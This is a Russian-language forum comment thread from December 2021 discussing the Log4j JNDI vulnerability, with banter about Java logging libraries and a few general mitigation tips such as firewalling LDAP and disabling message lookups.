    а я, дяденька, просто кратко вам пересказал доклад близко не бывавших рабино Wчл... текст свёрнут, показать
     
  • 3.102, Аноним (42), 15:10, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Успагойся, то был просто растотроллинг.
     
     
  • 4.107, Аноним (39), 15:17, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Успагойся, то был просто растотроллинг.

    Ну неприятно испытывать испанский стыд из-за таких петросянов. Типа шутка-троллинг, правда ее регулярно рассказывают далеко не первый год. Должно надесть жрать одно и то же.

     

     ....большая нить свёрнута, показать (24)

  • 1.48, Аноним (48), 11:16, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Это не уязвимость. Это - бэкдор, подобную функциональность включать в логах.
     
     
  • 2.52, Онаним (?), 11:36, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Это не уязвимость, и не бэкдор. Это макакинг. А чо. Эвал прямо в логе - круто же, смотрите как мы можем, удобно, трендово, смузи, вейп...
     
  • 2.58, Онаним (?), 11:50, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    "Фреймворк для ведения логов" - это звучит крутенько.
     

  • 1.61, mos87 (ok), 12:06, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    глобально и надёжно
     
     
  • 2.64, Аноним (64), 12:13, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Надежно можно получать неофициальную информацию от кого угодно. Да там таких уязвимостей на много лет припасено.  
     
     
  • 3.78, Michael Shigorin (ok), 13:04, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Да там таких уязвимостей на много лет припасено.

    Вспомнилось: https://www.opennet.ru/openforum/vsluhforumID3/125836.html#85 (надеюсь, erthink со временем доберётся там своей рукой написать, о чём говорил -- попросил его).

    PS: нашлись все три комментария в первоисточнике, процитировал там же.

     
  • 2.119, Онаним (?), 16:58, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > глобально и надёжно

    Энтерпрайзно.
    Logs-as-a-code.

     

  • 1.63, Аноним (64), 12:11, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А вот если бы писали на Хаскеле...
     
     
  • 2.79, Michael Shigorin (ok), 13:05, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    ...да с таким же упованием на дело рук человеческих токмо...
     

  • 1.65, Аноним (65), 12:14, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Говоря откровенно, Log4j уже лет 10 как не рекомендуется использовать. Есть SLF4j и logback на замену.
     
     
  • 2.67, Аноним (67), 12:25, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У нас в рекомендациях от архитектуры всё ровно наоброт, мол slf4j и logback уже давно мёртвые, а log4j2 ещё и лучше оптимизирован и вообще allocation-free. Хотя я когда то попал в дебри исходников log4j2 - опплевался.
     
     
  • 3.75, Аноним (65), 12:45, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Если пользоваться Spring, то logback официально рекомендуемый.
     
     
  • 4.166, Наме (?), 11:15, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А не надо спрингом пользоваться.
     
  • 3.88, ELF (ok), 13:25, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    он log4j 1х, это да, 10 лет из танка не вылезал
     
     
  • 4.106, пох. (?), 15:16, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > он log4j 1х, это да, 10 лет из танка не вылезал

    ты уверен что во второй версии нет той же самой фичи? Не может быть! Должны были добавить, а не убавить.

     
     
  • 5.113, ELF (ok), 16:38, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а первую не рекомендуют использовать уж 10 лет, кстати новость была - Катастрофическая уязвимость в Apache log4j, из нее как-будто это про log4j 1.х , теперь желтуху убрали и с версией определились.

     
     
  • 6.145, пох. (?), 13:36, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > речь как раз про вторую версию - рекомендуемую (с дебильной фичей), а

    а, ну вот, теперь мир снова перевернут в нормальное положение.

    В первой может и правда такой фичи еще не додумались - не рекомендую ее использовать, скучная она какая-то, не может внезапно с чужого ldap что-нить этакое исполнить.


     
  • 3.165, Наме (?), 11:15, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Есть JUL и его хватает для всего.
     
  • 2.86, morphe (?), 13:21, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Много где slf4j стоит с log4j бекендом, из-за того что много существующих либ работают через log4j
    Ну и наоборот бывает, log4j направленный в slf4j
     
  • 2.111, Ololo (?), 16:23, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Slf4j - по сути фасад, который можно навесить над разными логерами, в т.ч. log4j
     
  • 2.131, hohoho (?), 21:55, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Глупость, куда твой slf4j логирует? Это интерфейс.
     
     
  • 3.139, Аноним (-), 09:42, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Глупость, куда твой slf4j логирует?

    в logback, как выше написано

     

  • 1.70, Аноним (70), 12:34, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    там чтобы уязвимость работали макака должна пользовательскую строку не как параметр добавить а явно приконкатинировать в сообщение с масками.
    То есть джава-макаки не знают как работать с printf
     
     
  • 2.83, morphe (?), 13:18, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Неа, оно раскрывается уже после подстановки параметров в строку форматирования
    Т.е .error("{}", userInput) тоже уязвим
     

  • 1.72, Аноним (72), 12:36, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Самое время задействовать умение настройки firewall.
    Блокируем исходящие соединения на порт 389. При необходимости, впереди добавляем разрешающее правило с указанием нужных IP.
     
     
  • 2.81, пох. (?), 13:11, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Самое время задействовать умение настройки firewall.
    > Блокируем исходящие соединения на порт 389.

    ой, вендовая сеть легла. Кнутователь уже бежит в твою сторону.

    Не, я не советую выяснять нужные адреса уже после добавления шибкоумной настройки. Могут успеть добежать с кнутом.


    P.S. нет, периметр это хорошо и полезно, но вот беда - в любой большой сети всегда можно найти где-нибудь в дальнем-темном углу еще что-то уязвимое, что само по себе было бы безопасным поскольку никуда доступов не имеет и ничего ценного не содержит. Но на него может зайти сервер. И поскольку оба внутри периметра...


     
  • 2.85, morphe (?), 13:19, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В url можно свой порт передать, никто не заставляет сервер с ldap держать не на стандартном порту
     
     
  • 3.104, пох. (?), 15:13, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > В url можно свой порт передать, никто не заставляет сервер с ldap
    > держать не на стандартном порту

    ffuck... и что, эта тварь туда и полезет? (я почти уверен что таки да, к*к*к*кодереюзе жеж, зачем нам как-то по особому парсить урл для лдапа. Ну и у кого с внутренних серверов конторы наглухо перекрыт 80й?)

     

  • 1.80, Аноним (80), 13:06, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Причём тут java впринципе? Мамкины кодеры любят использовать тонны third-party фреймворков. Да, не спорю что так код писать быстрее но если нужно надежнее - не используй 3rd party если можешь обойтись, особенно для критически уязвимой инфраструктуры.
     
     
  • 2.89, ELF (ok), 13:28, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    молодец, профессионала за версту видно
     
  • 2.96, OramahMaalhur (ok), 14:11, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    А вы таки переизобретаете логгер для критически уязвимой инфраструктуры каждого своего хелловолда?
     
     
  • 3.127, Онаним (?), 21:04, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не надо переизобретать логгер.
    Достаточно один раз его написать, и каждый хеллоуворлд сможет его юзать.
    Но это будет не third-party код, в который нечаянно eval левые васяны уже не добавят.
     
  • 2.128, Онаним (?), 21:05, 10/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Абсолютно да. Third party только по абсолютной необходимости, всегда *хотя бы* с визуальным аудитом, без автообновления.
     

  • 1.94, Аноним (94), 13:41, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вполне ожидаемо от апача и жавы.
     
  • 1.109, IdeaFix (ok), 16:12, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    У бизнеса лог4ж-1.2  массово... все эти новые технологии в бизнес не придут еще 100 лет.
     
  • 1.122, n00by (ok), 17:41, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Зато Eclipse после установки лагина приходится перезапускать.
     
  • 1.132, hohoho (?), 21:59, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В статье не упоминается что уязвимость в PatternLayout. Если вы используете другой лэйоут, например jsonовский EcsLayout, то бэкдор не работает.
     
  • 1.134, Аноним (134), 22:46, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вспоминается та недавняя уявзимость в imagemagick. Тоже ходило в интернет куда скажут.

    Почему в мануалах ещё в отдельном разделе выделенном большими красными буквами не предупреждают, что программа/библиотека будет сама лазать куда-то в интернет в таких-то и таких-то случаях?

     
     
  • 2.136, Аноним (136), 03:33, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    По хорошему такого поведения без лишних телодвижений быть не должно и предупреждать тогда ни о чем не нужно. Безопасное поведение по умолчанию. В этом плане авторы log4j подложили свинью пользователям библиотеки.
     

  • 1.135, Аноним (-), 23:07, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    На жабе не пишу, но недавно приходилось прикручивать кое-какие поделки через JNI. С этого log4 плевался особенно долго. Где-то читал, что жабу ждет судьба кобола. Легаси сектор и хорошая зарплата кому уже пох и пенсия скоро.
     
     
  • 2.138, пох. (?), 09:04, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не читай ту глупую мурзилку больше.

    Жабу ждет судьба кобола возведенного в факториал. Т.е. хороших зарплат будет больше чем способных их получить, поскольку разбираться в нагромождениях чужого кода это тебе не гуанокодить с нуля абы что, поэтому нанимать будут И тех кому пох и пенсия, и кто только что открыл учебник, и кто даже не открывал но нассал манагеру в уши. И всех на хорошую зарплату. И смогут морщить морду что смузи в этой лавке по утрам подают клубничный, а им нравится банановый, немедленно увольняюсь. Но их понадобятся миллионы, а не тысяча.

    Учи жабу, сынок, учи - это беспроигрышно. Вооон сколько сейчас полезут пересобирать прожекты от которых ни доков ни понимания не осталось, но торчат наружу и используют нескучный log4j2

     
     
  • 3.156, Аноним (-), 03:14, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вот уж действительно все плохо там у вас.
    Не, снова учить всякую каку это уж слишком. Я ее только недавно забыл.
     
  • 2.147, Аноним (84), 16:06, 11/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Программистам на Коболе так и не стали платить заоблачные зарплаты
     
     
  • 3.152, _ (??), 03:45, 12/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    В России? Конечно не платят, откуда в ней софт на Коблое?!?!
    В США к примеру - платят, их Java Senior Developerы завидуют аж до позеленения и квакаютЪ :)
    Но всё имеет начало и конец - в облаках мэйнфреймов нет, сказка идёт к развязке.
     
     
  • 4.159, пох. (?), 08:28, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > В России? Конечно не платят, откуда в ней софт на Коблое?!?!
    > В США к примеру - платят, их Java Senior Developerы завидуют аж
    > до позеленения и квакаютЪ :)
    > Но всё имеет начало и конец - в облаках мэйнфреймов нет, сказка
    > идёт к развязке.

    будут эмулировать. Квалификация исчезает быстрее мэйнфреймов, поэтому переписать то от чего на самом деле зависят деньги - никто не возьмется. Те программисты-на-коболе - тем более не возьмутся, даже если бы могли именно переписать, а не по мелочи править тридцатилетний код, у них нет желания героически сделать мир чуточку хуже.

     
  • 4.163, Наме (?), 10:32, 13/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Облака медленные и данные из мэнфрейма перенести это как на луну в очередной раз слетать.
     

  • 1.148, InuYasha (??), 17:12, 11/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Весь мир в труху, абсурд, коррупцию, хаос и скайнеты. )

    PS: Java - и пусть весь мир подож..жёт. )

     
  • 1.154, spanjokus (ok), 17:13, 12/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    катастрофическая
     
  • 1.161, Наме (?), 10:24, 13/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    log4j всегда был индуским шлаком. Надо быть без башки, чтобы его использовать в проме.
     
  • 1.162, Наме (?), 10:30, 13/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А файрвол не? JNDI-запросы наружу это как-то вызывает вопросы, мягко скажем.
     
  • 1.169, shricke (??), 17:37, 13/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    В теории, если в java security настроено разрешение загрузки классов только из разрешенных папок, то exploit не должен сработать.

    Теперь как это можно пофиксить:
    1) Без обновления библиотеки:
    Отключить через параметр с перезапуском jvm: -Dlog4j2.formatMsgNoLookups=true
    2) Обновить log4j на версию 2.15

     
  • 1.174, szt1980 (ok), 00:02, 17/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А все потому, что не на растишке написан.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2022 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру